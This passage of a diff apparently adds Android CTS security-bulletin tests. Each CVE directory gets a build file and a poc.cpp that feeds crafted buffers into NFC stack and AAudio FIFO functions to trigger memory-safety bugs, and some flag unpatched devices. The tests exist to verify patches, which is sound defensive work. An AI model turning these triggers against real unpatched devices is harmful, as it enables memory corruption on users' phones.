+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include "llcp_api.h"
+
+#define DEFAULT_VALUE 0x06
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_connect(uint8_t* p_bytes, uint16_t length,
+ tLLCP_CONNECTION_PARAMS* p_params);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_connect(&p_bytes[offset], LENGTH, ¶ms);
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
new file mode 100644
index 0000000..f625438
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9563",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
new file mode 100644
index 0000000..e021114
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_api.h>
+
+#define DEFAULT_VALUE 0x02
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_cc(uint8_t* p_bytes, uint16_t length,
+ uint16_t* p_miu, uint8_t* p_rw);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_cc(&p_bytes[offset], LENGTH, &(params.miu), &(params.rw));
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
new file mode 100644
index 0000000..0813445
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9584",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
new file mode 100644
index 0000000..94aa642
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE *p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+
+ // Set evt_data.set_config.status
+ *p_msg = 0x03;
+ // Set evt_data.set_config.num_param_id
+ *(p_msg + 1) = 255;
+ nfc_ncif_set_config_status(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
new file mode 100644
index 0000000..8bbdd4f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9585",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
new file mode 100644
index 0000000..7227adf
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE* p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+ memset(p_msg, 0x01, LENGTH);
+
+ // Set evt_data.tlv_size
+ *(p_msg + 5) = 200;
+ nfc_ncif_proc_get_routing(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
new file mode 100644
index 0000000..8315084
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2019-2007",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libaaudio_internal",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libaaudio/src",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
new file mode 100644
index 0000000..7f8ebdb
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "fifo/FifoBuffer.h"
+#include "fifo/FifoController.h"
+#include <stdlib.h>
+
+#define CAPACITY 83
+#define THRESHOLD 47
+#define NUM_FRAMES -9999999999
+
+using android::FifoController;
+
+int main() {
+ FifoController fifoController(CAPACITY, THRESHOLD);
+ fifoController.advanceReadIndex((android::fifo_frames_t)NUM_FRAMES);
+ fifoController.advanceWriteIndex((android::fifo_frames_t)NUM_FRAMES);
+ int32_t readIndex = fifoController.getReadIndex();
+ int32_t writeIndex = fifoController.getWriteIndex();
+
+ if ((readIndex < 0) || (writeIndex < 0)) {
+ return EXIT_VULNERABLE;
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
new file mode 100644
index 0000000..7ffdd65
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2013",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
new file mode 100644
index 0000000..23098ac
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
@@ -0,0 +1,168 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <dlfcn.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#define T3T_MSG_FELICALITE_MC_OFFSET 0x01
+
+char enable_selective_overload = ENABLE_NONE;
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
+ uint8_t mrti_check, uint8_t mrti_update);
+
+static void (*real_GKI_freebuf)(void* ptr) = nullptr;
+void *kAllocatedPointers[2];
+int allocatedPointersIndex = -1;
+bool kIsInitialized = false;
+
+void init(void) {
+ real_GKI_freebuf = (void (*)(void*))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void GKI_freebuf(void* ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ if (ptr == kAllocatedPointers[0] || ptr == kAllocatedPointers[1]) {
+ return;
+ } else {
+ real_GKI_freebuf(ptr);
+ }
+}
+
+void *allocate_memory(size_t size) {
+ void *ptr = malloc(size);
+ memset(ptr, 0x0, size);
+ kAllocatedPointers[++allocatedPointersIndex] = ptr;
+ return ptr;
+}
+
+// borrowed from rw_i93.cc
+enum {
+ RW_T3T_CMD_DETECT_NDEF,
+ RW_T3T_CMD_CHECK_NDEF,
+ RW_T3T_CMD_UPDATE_NDEF,
+ RW_T3T_CMD_CHECK,
+ RW_T3T_CMD_UPDATE,
+ RW_T3T_CMD_SEND_RAW_FRAME,
+ RW_T3T_CMD_GET_SYSTEM_CODES,
+ RW_T3T_CMD_FORMAT,
+ RW_T3T_CMD_SET_READ_ONLY_SOFT,
+ RW_T3T_CMD_SET_READ_ONLY_HARD,
+
+ RW_T3T_CMD_MAX
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_T3T_STATE_NOT_ACTIVATED,
+ RW_T3T_STATE_IDLE,
+ RW_T3T_STATE_COMMAND_PENDING
+};
+
+// borrowed from rw_i93.cc
+enum {
+ /* Sub states for formatting Felica-Lite */
+ RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
+ formatting) */
+ RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-read to complete */
+ RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-write to complete */
+ RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
+ to complete */
+
+ /* Sub states for setting Felica-Lite read only */
+ RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
+ setting read only) */
+ RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
+ to complete */
+ RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-read to complete */
+ RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl)
+ block-write to complete */
+};
+
+void cback(uint8_t c __attribute__((unused)),
+ tRW_DATA* d __attribute__((unused))) {
+}
+
+int main() {
+
+ enable_selective_overload = ENABLE_ALL;
+ tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
+ uint8_t mrti_check = 1, mrti_update = 1;
+ if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+ p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+ p_data->status = NFC_STATUS_OK;
+
+ p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD;
+ p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
+ p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK;
+
+ NFC_HDR* p_msg = (p_data->data).p_data;
+ p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;
+
+ uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
+ p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
+ p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;
+
+ uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA];
+ p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ TIMER_LIST_ENT pFirst = { };
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ rw_cb.p_cback = &cback;
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp
new file mode 100644
index 0000000..b5a7b99
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2014",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
new file mode 100644
index 0000000..26c607e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <rw_int.h>
+#include <stdlib.h>
+
+#include "../includes/common.h"
+
+// borrowed from rw_t3t.cc
+#define RW_T3T_SENSF_RES_RD_OFFSET 17
+#define RW_T3T_SENSF_RES_RD_LEN 2
+#define DEFAULT_VALUE 0xBE
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void cback(uint8_t, tRW_DATA *) {}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+int main() {
+ tRW_T3T_CB *p_cb = &rw_cb.tcb.t3t;
+
+ GKI_init();
+ rw_init();
+ rw_cb.p_cback = &cback;
+
+ for (int n = 0; n < NCI_NFCID2_LEN; ++n) {
+ p_cb->peer_nfcid2[n] = DEFAULT_VALUE;
+ }
+
+ p_cb->num_system_codes = T3T_MAX_SYSTEM_CODES;
+ p_cb->flags = RW_T3T_FL_W4_GET_SC_POLL_RSP;
+
+ uint8_t nci_status = NCI_STATUS_OK;
+ uint8_t num_responses = 1;
+ uint8_t sensf_res_buf_size =
+ RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN;
+ uint8_t *p_sensf_res_buf =
+ (uint8_t *)malloc(RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN);
+ rw_t3t_handle_nci_poll_ntf(nci_status, num_responses, sensf_res_buf_size,
+ p_sensf_res_buf);
+
+ free(p_sensf_res_buf);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp
new file mode 100644
index 0000000..fe66191
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2019",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfc/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
new file mode 100644
index 0000000..483b7c4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ce_int.h>
+#include <nfc_int.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#define OFFSET 8
+#define VULNERABLE_LENGTH 0
+
+char enable_selective_overload = ENABLE_NONE;
+
+extern tNFC_CB nfc_cb;
+extern tCE_CB ce_cb;
+
+void GKI_freebuf(void* p_buf __attribute__((unused))) {}
+
+void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {}
+
+void nfc_stop_timer(TIMER_LIST_ENT*) {}
+
+void nfc_stop_quick_timer(TIMER_LIST_ENT*) {}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ GKI_init();
+ ce_init();
+ ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;
+
+ if (ce_select_t4t() != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16);
+ NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data;
+ p_c_apdu->len = VULNERABLE_LENGTH;
+ p_c_apdu->offset = OFFSET;
+ uint8_t conn_id = 1;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
new file mode 100644
index 0000000..bd2504e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2035",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
new file mode 100644
index 0000000..a5dfb29
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
@@ -0,0 +1,111 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
